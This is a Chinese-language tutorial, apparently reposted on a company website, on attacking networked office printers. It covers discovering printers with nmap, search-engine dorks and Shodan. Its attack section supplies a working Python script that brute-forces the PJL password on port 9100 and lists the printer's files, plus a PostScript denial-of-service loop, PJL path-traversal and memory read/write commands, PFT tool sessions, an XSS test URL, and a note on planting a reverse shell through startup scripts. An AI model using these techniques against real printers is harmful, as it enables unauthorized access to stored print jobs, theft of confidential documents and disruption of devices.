發(fā)布源:深圳維創(chuàng)信息技術(shù)發(fā)布時(shí)間:2020-10-27 瀏覽次數(shù): 次
一、前言經(jīng)過(guò)最近一段時(shí)間測(cè)試,發(fā)現(xiàn)企業(yè)內(nèi)網(wǎng)打印機(jī)存在多種數(shù)據(jù)泄露漏洞,同時(shí)也經(jīng)常被大家所忽略,因此才有本文的研究。
當(dāng)一臺(tái)打印機(jī)連接網(wǎng)絡(luò),可以進(jìn)行端口掃描、讀寫(xiě)上傳惡意文件、反彈shell,相當(dāng)于一臺(tái)服務(wù)器。
常見(jiàn)攻擊,信息泄露,如訪(fǎng)問(wèn)內(nèi)存,可能發(fā)現(xiàn)密碼或打印文件中的敏感數(shù)據(jù),訪(fǎng)問(wèn)文件系統(tǒng),泄露配置文件或存儲(chǔ)的打印作業(yè);DOS;遠(yuǎn)程代碼執(zhí)行漏洞RCE,通過(guò)緩沖區(qū)溢出漏洞,構(gòu)造惡意數(shù)據(jù)包,使打印機(jī)執(zhí)行惡意代碼,將固件更新為含有惡意的固件;打印任務(wù)控制,修改打印內(nèi)容等。
二、打印機(jī)語(yǔ)言在研究打印機(jī)前有必要熟悉打印語(yǔ)言,網(wǎng)上各種介紹打印機(jī)語(yǔ)言,大家看的會(huì)比較混亂,比如有時(shí)候是打印機(jī)描述語(yǔ)言,有時(shí)候又叫打印機(jī)控制語(yǔ)言。
下面以本人的理解去介紹打印機(jī)語(yǔ)言,其實(shí)打印機(jī)語(yǔ)言按分類(lèi)是有兩類(lèi),一種是頁(yè)面描述語(yǔ)言(PDL),另一種是嵌入式語(yǔ)言(Escape碼語(yǔ)言),而HP的PCL控制語(yǔ)言和PostScript(以下簡(jiǎn)稱(chēng) PS)都屬于PDL頁(yè)面描述語(yǔ)言。
1. PS與PCL介紹PS、PCL等打印語(yǔ)言其實(shí)是一個(gè)命令集,它告訴打印機(jī)如何組織被打印的文檔。
打印機(jī)驅(qū)動(dòng)程序把這些命令嵌在打印數(shù)據(jù)中傳給打印機(jī),而不是單獨(dú)傳送,并由打印機(jī)的打印控制器再分開(kāi)解釋。
PCL網(wǎng)上介紹的都差不多,PCL對(duì)計(jì)算機(jī)系統(tǒng)資源占用也較少,同時(shí)對(duì)字庫(kù)、圖像的解釋能力較強(qiáng)等,關(guān)鍵還是把本文前面部分弄懂,否則會(huì)很混亂,不利于對(duì)打印機(jī)的漏洞研究。
2. 對(duì)比PCL在處理文本、文檔方面比較出色(已支持圖形功能),速度明顯,但是打印質(zhì)量與PS差距不大,PS在處理打印大的文件,如PDF、Photoshop等軟件下打印大的圖形圖像文件有速度優(yōu)勢(shì),準(zhǔn)確度、色彩方面比PCL強(qiáng)。
所以 PCL語(yǔ)言適用于普通的商務(wù)辦公應(yīng)用,PS適用于對(duì)圖形和色彩準(zhǔn)確度要求比較高的專(zhuān)業(yè)應(yīng)用。
3. 工作流程在計(jì)算機(jī)上將打印內(nèi)容位圖格式解釋成標(biāo)準(zhǔn)的頁(yè)面描述文件,為PostScript、PCL等格式,這種文件被傳到打印機(jī)的控制器中,控制器將頁(yè)面描述文件,發(fā)送給光柵圖像處理器 (Raster Image Processor),把PostScript、PCL格式解釋成位圖格式,打印機(jī)才可以打印位圖格式的圖像。
4. PJL打印任務(wù)語(yǔ)言(PJL)用于指導(dǎo)打印機(jī)行為,利用PJL語(yǔ)言可以對(duì)打印任務(wù)執(zhí)行管理性的更改設(shè)置,對(duì)打印文件形成有限管理控制,例如,在打印機(jī)文件系統(tǒng)下用戶(hù)不經(jīng)常留意的以下特定位置中,它可對(duì)打印文件執(zhí)行存儲(chǔ)刪除操作。
其它打印機(jī)語(yǔ)言是PCL的擴(kuò)展,如打印機(jī)作業(yè)語(yǔ)言PJL是 PCL的擴(kuò)展,用于控制打印機(jī)的行為,上面提到PCL只處理內(nèi)容,擴(kuò)展的PJL則可以永久性的修改設(shè)備的設(shè)置,如印紙張大小和數(shù)量。
而 PJL可以被用來(lái)執(zhí)行DoS攻擊、打印頁(yè)面控制、讀取文件系統(tǒng)和內(nèi)存,甚至惡意固件更新。
供應(yīng)商往往只支持PJL 控制語(yǔ)言中的部分命令,并根據(jù)打印機(jī)的需要自行添加專(zhuān)有的功能。
5. PPDPS、PCL都是一種與設(shè)備無(wú)關(guān)的打印機(jī)語(yǔ)言,它們只處理打印的內(nèi)容,而與設(shè)備相關(guān)的分辨率、紙張大小它們不處理。
PS 、PCL可以將打印內(nèi)容解釋成頁(yè)面描述文件,這個(gè)文件會(huì)被控制器解析并打印。
但是對(duì)譬如分辨率、紙張大小、進(jìn)紙盒進(jìn)行選擇時(shí),調(diào)用的是打印機(jī)描述(PostScript Printer Description ,即PPD)文件來(lái)實(shí)行各種打印機(jī)的不同特性,PS、PCL 語(yǔ)言在打印的時(shí)候,即定義圖像時(shí)根本不用去考慮打印機(jī)的分辨率、紙張大小,由打印機(jī)的PPD文件來(lái)決定,給處理字體帶來(lái)了極大的靈活性。
PPD文件主要提供以下與打印機(jī)有關(guān)的特定信息::默認(rèn)/ 最高分辨率,是否支持半色調(diào)監(jiān)控,用戶(hù)設(shè)定的監(jiān)控信息,頁(yè)面大小定義,頁(yè)面可打印區(qū)域,默認(rèn)字體(通常為Courier),是否支持雙面打印等等。
每一種不同的 PostScript打印機(jī)都分別對(duì)應(yīng)有專(zhuān)門(mén)的PPD文件。
關(guān)于PostScript仿真,因?yàn)槟壳笆褂肞ostScrit語(yǔ)言需要向 Adobe公司支付一筆費(fèi)用,成本較高,因此才有與PostScript完全兼容的PostScript仿真,像 HP公司的一些激光打印機(jī)中使用的PostScript仿真,也無(wú)需再支付Adobe公司相應(yīng)的費(fèi)用。
6. 利用PS可以用于各種攻擊,例如拒絕服務(wù),打印作業(yè)處理和保留以及訪(fǎng)問(wèn)打印機(jī)的文件系統(tǒng)等惡意操作。
打印機(jī)指令語(yǔ)言PCL很難被攻擊利用,該頁(yè)面描述語(yǔ)言不直接訪(fǎng)問(wèn)底層文件系統(tǒng),因此和PS相比,該描述語(yǔ)言并不是很適合用于攻擊的目的,不過(guò)PCL的擴(kuò)展PJL容易受到攻擊,下文基本上是基于PJL。
三、 探測(cè)打印機(jī)1. namp-A 192.168.1.*主要查看開(kāi)放哪些端口,并檢測(cè)操作系統(tǒng)指紋,一般開(kāi)放如下端口、服務(wù)為打印機(jī):2. Savins打印機(jī)發(fā)現(xiàn)SmartDeviceMonitor工具,可以搜索Savins打印機(jī),去官網(wǎng)下載:3. JetDirect打印機(jī)JetAdminJetAdmin可用來(lái)控制、搜索JetDirect打印機(jī),可快速找出子網(wǎng)中的JetDirect打印機(jī),它通過(guò)SNMP廣播網(wǎng)絡(luò)來(lái)定位打印機(jī)。
4. ARP協(xié)議掃描NMAP、Cain,通過(guò)MAC地址發(fā)現(xiàn) Hewlett Packard、Ricoh或其它廠(chǎng)商的MAC地址。
nmap-R192.168.1.0/245. 谷歌搜索打印機(jī)的WEB登陸鏈接放置在內(nèi)網(wǎng)站點(diǎn)上,易于他們管理或存儲(chǔ)文檔,但有時(shí)內(nèi)網(wǎng)并不是真正處于內(nèi)網(wǎng)中,但可以通過(guò)互聯(lián)網(wǎng)訪(fǎng)問(wèn)到。
Ricoh Savins(由于打印機(jī)頻繁地存儲(chǔ)文檔,導(dǎo)致被下載,這確實(shí)是一個(gè)真正的安全殺手):intitle:"webimagemonitor""/web/user/en/websys/webArch/mainFrame.cgi"inurl:"/en/sts_index.cgi"HPJetdirects(各型號(hào)均不相同)inurl:hp/device/this.LCDispatcherCUPSConnectedPrintersinurl:":631/printers"-php-demo6. 其它搜索shodan搜索,device:printer。
鐘馗之眼搜索,service:”jetdirect”。
四、漏洞挖掘
1. PJL密碼爆破若打印機(jī)的9100端口向公網(wǎng)開(kāi)啟,在向打印機(jī)發(fā)送PJL指令之前需要對(duì)使用者的身份進(jìn)行認(rèn)證,認(rèn)證程序的密鑰長(zhǎng)度為2字節(jié)(Byte),通過(guò)爆破可以將 PJL 的密碼安全保護(hù)禁用,最終執(zhí)行任意PJL命令。
如果直接通過(guò)9100端口執(zhí)行PJL命令,說(shuō)明存在未授權(quán)訪(fǎng)問(wèn)。
PJL是打印控制語(yǔ)言PCL的擴(kuò)展。
文章前面部分已經(jīng)介紹過(guò),這里是針對(duì)認(rèn)證PJL的爆破,否則無(wú)法使用PJL命令。
危害:通過(guò) PJL 除了能夠查看和更改打印機(jī)狀態(tài)之外,還可以對(duì)打印機(jī)內(nèi)置的文件系統(tǒng)進(jìn)行訪(fǎng)問(wèn),進(jìn)而可繞過(guò)密碼驗(yàn)證通過(guò) PJL 對(duì)打印機(jī)內(nèi)置的文件系統(tǒng)進(jìn)行讀寫(xiě)。
文件系統(tǒng)包含后臺(tái)處理打印作業(yè)、收到的傳真、日志文件和配置文件。
9100端口一般為JetDirect的端口,JetDirect雖然是惠普設(shè)計(jì)的,但是眾多打印機(jī)都使用該軟件,包括Canon、Lexmark、Samsung和Xerox。
該軟件負(fù)責(zé)處理通過(guò)網(wǎng)絡(luò)提交的打印請(qǐng)求。
網(wǎng)絡(luò)打印機(jī)通過(guò)JetDirect協(xié)議,偵聽(tīng),接收打印請(qǐng)求數(shù)據(jù)。
如下是PJL密碼存儲(chǔ)格式:@PJLJOBPASSWORD=0@PJLDEFAULTPASSWORD=12345@PJLDEFAULTDISKLOCK=ON@PJLDEFAULTCPLOCK=ON可通過(guò) 內(nèi)存和文件系統(tǒng)讀取獲取密碼,或暴力破解。
爆破代碼python3如下:importsocketimportsysdefmain():iflen(sys.argv)<=1:print('Parameterserror')returns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.settimeout(10)s.connect((sys.argv[1],9100))s.settimeout(None)#發(fā)送讀取設(shè)備ID的PJL指令s.send(('33%-12345X@PJLINFOID\r\n33%-12345X\r\n').encode('UTF-8'))print(s.recv(1024).decode('UTF-8'))foriinrange(1,65536):buf=b''#發(fā)送重置密碼的PJL指令s.send(('33%-12345X@PJL\r\n@PJLJOBPASSWORD='+str(i)+'\r\n@PJLDEFAULTPASSWORD=0\r\n@PJLEOJ\r\n33%-12345X\r\n').encode('UTF-8'))ifi%30==0:#發(fā)送查詢(xún)密碼保護(hù)狀態(tài)的PJL指令s.send(('33%-12345X@PJL\r\n@PJLDINQUIREPASSWORD\r\n33%-12345X\r\n').encode('UTF-8'))whileTrue:buf+=s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:#密碼保護(hù)被禁用buf.index(b'DISABLED')print('passworddisabledok!')#發(fā)送查詢(xún)目錄的PJL指令s.send(('33%-12345X@PJL\r\n@PJLFSDIRLISTNAME="0:\\"ENTRY=1COUNT=99\r\n33%-12345X\r\n').encode('UTF-8'))buf=b''whileTrue:buf+=s.recv(1)print(buf)try:buf.index(b'\r\n\x0c')try:#查詢(xún)成功buf.index(b'ENTRY')print('PoCOK!')returnexceptValueError:print('PoCNO!')returnexceptValueError:continueexceptValueError:print('passworddisabledfaild!')finally:s.close()returnexceptValueError:continues.close()if__name__=='__main__':main()pft使用此腳本爆破:返回password disabled ok!,說(shuō)明成功禁用PJL密碼保護(hù)。
此腳本先爆破PFT密碼保護(hù),如果爆破成功,然后執(zhí)行查詢(xún)磁盤(pán)的PJL命令,當(dāng)然也可只用PFT工具,文章后面部分會(huì)講PFT。
2. DOS當(dāng)向打印機(jī)9100端口發(fā)送任何數(shù)據(jù),打印機(jī)都可將其打印出來(lái),文章前部分發(fā)現(xiàn),9100端口還支持原始打印、PCL、PostScript和PJL,即可以通過(guò)9100端口執(zhí)行PJL。
當(dāng)執(zhí)行DOS,則可無(wú)限循環(huán)打印任務(wù),導(dǎo)致打印任務(wù)不斷執(zhí)行,資源耗盡,無(wú)法執(zhí)行打印操作。
按個(gè)人理解簡(jiǎn)單點(diǎn)說(shuō),就是當(dāng)發(fā)起打印任務(wù)時(shí),打印機(jī)等任務(wù)發(fā)起結(jié)束,才會(huì)執(zhí)行下一步的打印操作,如果一直循環(huán)打印任務(wù),則無(wú)法到達(dá)下一步。
通過(guò)幾行PostScript代碼實(shí)現(xiàn)DOS。
PS代碼實(shí)現(xiàn)的循環(huán):%!{}loop3. 路徑遍歷漏洞-案例分析這不是針對(duì)某個(gè)型號(hào)的漏洞,算是打印機(jī)的一個(gè)通用漏洞,可以通過(guò)../等進(jìn)行目錄穿越,對(duì)文件進(jìn)行讀取和寫(xiě)入,不過(guò)并不是所有的目錄文件都可讀寫(xiě),當(dāng)發(fā)現(xiàn)無(wú)法讀寫(xiě)時(shí),可繼續(xù)切換其它目錄測(cè)試,可能存在可讀寫(xiě)的文件,從而泄露敏感文件,如“Jobs”目錄中存儲(chǔ)的就是打印任務(wù),可以通過(guò)PFT 、PRET工具包讀取存儲(chǔ)在其中的任何打印任務(wù)。
如果允許 PJL 命令訪(fǎng)問(wèn)該設(shè)備的文件系統(tǒng),遠(yuǎn)程攻擊者可以借助 PJL 讀取任意文件,遠(yuǎn)程連接打印機(jī)并進(jìn)行遍歷目錄操作。
這里借用個(gè)人之前的案例演示,通過(guò)9100端口執(zhí)行PJL命令,并且未授權(quán)訪(fǎng)問(wèn)打印機(jī)。
在學(xué)習(xí)之前,需要熟悉PJL命令。
如下是本人對(duì)PJL命令的整理:@PJLFSDELETENAME=“pathname”[<CR>]<LF>#刪除文件@PJLFSDOWNLOADFORMAT:BINARY[SIZE=int][<CR>]<LF>#下載文件到打印機(jī)@PJLFSINITVOLUME=“pathname”[<CR>]<LF>#初始化打印機(jī)文件系統(tǒng)@PJLFSMKDIRNAME=“pathname”[<CR>]<LF>#創(chuàng)建目錄@PJLDINQUIRECPLOCK#檢查控制面板狀態(tài)@PJLDINQUIREPASSWORD#檢查密碼保護(hù)狀態(tài)@PJLJOBPASSWORD=[Number:0to65535]#當(dāng)前密碼保護(hù)密碼@PJLDEFAULTPASSWORD[Number:0to65535]#修改保護(hù)密碼@PJLDEFAULTCPLOCK=[ON,OFF]#控制面板狀態(tài)@PJLSETIOBUFFER=[ON,OFF,AUTO]#設(shè)置緩沖區(qū)@PJLSETIOSIZE=[10-100]#設(shè)置緩存區(qū)大小@PJLSETPCNAME=[String]#設(shè)置計(jì)算機(jī)名稱(chēng)@PJLSETHOLD=[ON,JOB,STORE,PROOF]#設(shè)置文件保存@PJLSETHOLDKEY=[Number:0000to9999]#設(shè)置保存文件密碼@PJLDEFAULTDISKLOCK=[ON,OFF]#設(shè)置硬盤(pán)鎖定狀態(tài)@PJLSETSPOOLTIME#設(shè)置打印日期@PJLSETCOPIES#設(shè)置打印數(shù)@PJLSETJOBNAME#設(shè)置打印機(jī)文件名稱(chēng)@PJLSETRESOLUTION#設(shè)置分辨率@PJLSETDRIVERNAME#設(shè)置驅(qū)動(dòng)@PJLUSTATUSJOB#輸出隊(duì)列中還未打印任務(wù)的狀態(tài)@PJLCOMMENT#添加注釋@PJLSETOUTTRAY#出紙盤(pán)(紙張輸出位置)@PJLSETORIENTATION=[PORTRAIT,LANDSCAPE]#頁(yè)面方向@PJLSETDUPLEX=[ON,OFF]#雙工模式(雙面打印)@PJLSETBINDING=[LONGEDGE,SHORTEDGE]#雙工模式:短邊、長(zhǎng)邊@PJLRNVRAMADDRESS#讀取內(nèi)存@PJLOPMSGDISPLAY#設(shè)置打印機(jī)離線(xiàn)脫機(jī)@PJLSETSERVICEMODE#設(shè)置服務(wù)模式@PJLWNVRAMADDRESS#寫(xiě)入內(nèi)存@PJLFSDIRLISTNAME#讀取目錄@PJLFSQUERYNAME#讀取文件@PJLFSUPLOADNAME#文件上傳@PJLFSDOWNLOAD#寫(xiě)入文件(1) @PJL FSDIRLIST NAME=”0:/” ENTRY=1 COUNT=1024上圖發(fā)現(xiàn)目錄名稱(chēng)是 0:/,有兩個(gè)目錄,一個(gè)是本地目錄./,一個(gè)是../目錄。
(2) 讀取 ../ 目錄,發(fā)現(xiàn)其下有7個(gè),./代表本目錄@PJLFSDIRLIST NAME=”0:/../” ENTRY=1 COUNT=1024發(fā)現(xiàn)有:.TYPE=DIR..TYPE=DIRDataTYPE=DIRJobsTYPE=DIRTempTYPE=DIRBrowserTYPE=DIRPDLTYPE=DIR(3) 讀取Data目錄發(fā)現(xiàn)有Data、jobs目錄,這里演示訪(fǎng)問(wèn)其下的Data目錄,發(fā)現(xiàn)Data目錄存在這些目錄文件。
@PJLFSDIRLIST NAME=”0:/../data” ENTRY=1 COUNT=1024發(fā)現(xiàn)Data目錄存在這些目錄文件:.TYPE=DIR..TYPE=DIRDataContractTYPE=DIRCustomerDataDBTYPE=DIR總結(jié):目錄遍歷除了可讀取文件之外,還可寫(xiě)入,但是并不是所有的文件都可寫(xiě)入,尋找可寫(xiě)入的文件,如向啟動(dòng)腳本寫(xiě)入代碼,重啟即可執(zhí)行代碼反彈shell,這里我當(dāng)時(shí)時(shí)間有限,遍歷幾個(gè)目錄沒(méi)有發(fā)現(xiàn)啟動(dòng)腳本,不然只要可寫(xiě)入就能反彈shell。
路徑遍歷案例:中國(guó)移動(dòng)某省公司打印機(jī)未授權(quán)訪(fǎng)問(wèn)已成功下載移動(dòng)內(nèi)部資料(保密承諾書(shū)?)https://www.secpulse.com/archives/33663.html4. PFT工具根據(jù)文章前面部分,也大概知道了打印機(jī)攻擊是基于打印機(jī)語(yǔ)言命令,如輸入PJL命令造成相關(guān),需要掌握PJL命令,輸入PJL命令比較麻煩,這里有一個(gè)強(qiáng)大的打印機(jī)框架工具PFT, 而使用PFT工具可以無(wú)需掌握PJL命令,每一個(gè)參數(shù)已內(nèi)置打印機(jī)語(yǔ)言,只需要調(diào)用對(duì)應(yīng)參數(shù)來(lái)利用,配合help查看。
使用教程:(1) PFT連接到打印機(jī)pft>server192.168.15.200Serversetto192.168.15.200pft>port9100Portsetto9100pft>connectConnectedto192.168.15.200:9100Device:hpLaserJet4250(2) PFT清除PJL程序保護(hù)清除成功之后,也能登錄web控制臺(tái)頁(yè)面。
pft>envbruteforcetry30INFO:force_recv_clear()timedoutfor270bytes(10sec)Passworddisabledsuccessfully(3) 查看硬盤(pán)文件一般高級(jí)的打印機(jī)會(huì)有硬盤(pán),如下命令查看有哪些盤(pán)符。
pft>volumesVolumeSizeFreeLocationLabelStatus0:1261977611786240RAM?READ-WRITE(4) ls查看文件pft>ls0:\.-d..-dPostScript-dPJL-dsaveDevice-dwebServer-d(5) 將文件下載到本地get 文件名5. HP JetDirect打印機(jī)存儲(chǔ)型XSS攻擊者必須訪(fǎng)問(wèn)HP鐳射打印機(jī)配置頁(yè)面,”Product_URL”和”Tech_URL”參數(shù) 存在漏洞,對(duì)應(yīng)CVE號(hào):CVE-2012-3272。
點(diǎn)擊WEB的“支持信息” 連接,按如下輸入:點(diǎn)擊“Apply”按鈕,跳轉(zhuǎn)到支持頁(yè)面中(support.htm),出現(xiàn)彈框。
測(cè)試方法:http://[server]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply6. 打印控制任務(wù)PERT連接到打印機(jī),并嘗試?yán)么蛴C(jī)所使用的打印機(jī)語(yǔ)言(目前支持PS,PJL和PCL),如python pret.py IP PS可嘗試調(diào)用打印機(jī)PS語(yǔ)言進(jìn)行操作,一旦使用PRET連接到打印機(jī)中的一個(gè)功能,我們將可以做很多事情。
例如檢查文件系統(tǒng),創(chuàng)建目錄,更改配置文件、dump整個(gè)NVRAM。
如輸出打印“Foo”,執(zhí)行cross topsecret Foo:打印如下:7. 固件漏洞如果打印機(jī)不存在PJL命令執(zhí)行漏洞,可針對(duì)固件漏洞測(cè)試,通過(guò)nmap發(fā)現(xiàn)固件版本,Linux_Exploit_Suggester.pl查詢(xún)內(nèi)核版本漏洞。
nmap掃描出如下:執(zhí)行perl Linux_Exploit_Suggester.pl -k 2.6.31:PS:該工具只能查詢(xún)內(nèi)核3.4.4之前的漏洞信息。
github下載:https://github.com/IntepSecureLabs/Linux_Exploit_Suggester五、總結(jié)從打印機(jī)語(yǔ)言到PJL命令執(zhí)行等漏洞分析,包括打印機(jī)挖掘思路以及案例分析,總結(jié)了目前常見(jiàn)的打印機(jī)數(shù)據(jù)泄露漏洞,其它的高級(jí)應(yīng)用也是基于這些原理基礎(chǔ)上,這里不講PRET工具使用,網(wǎng)上有很多PRET使用教程。
需要提醒一下,大家不要隨便亂用工具來(lái)掃打印機(jī),否則會(huì)打印出很多請(qǐng)求數(shù)據(jù)包,浪費(fèi)大量的紙張。
因?yàn)檫@些腳本在端口9100/tcp檢測(cè)系統(tǒng)版本時(shí),會(huì)發(fā)送探針請(qǐng)求,判斷9100上運(yùn)行的是何種服務(wù),由于JetDirect并不知道它發(fā)送的是什么數(shù)據(jù),因此會(huì)打印出探測(cè)報(bào)文,最后會(huì)打印出一堆垃圾數(shù)據(jù)。
Copyright © 2021 深圳市維創(chuàng)信息技術(shù)有限公司 版權(quán)所有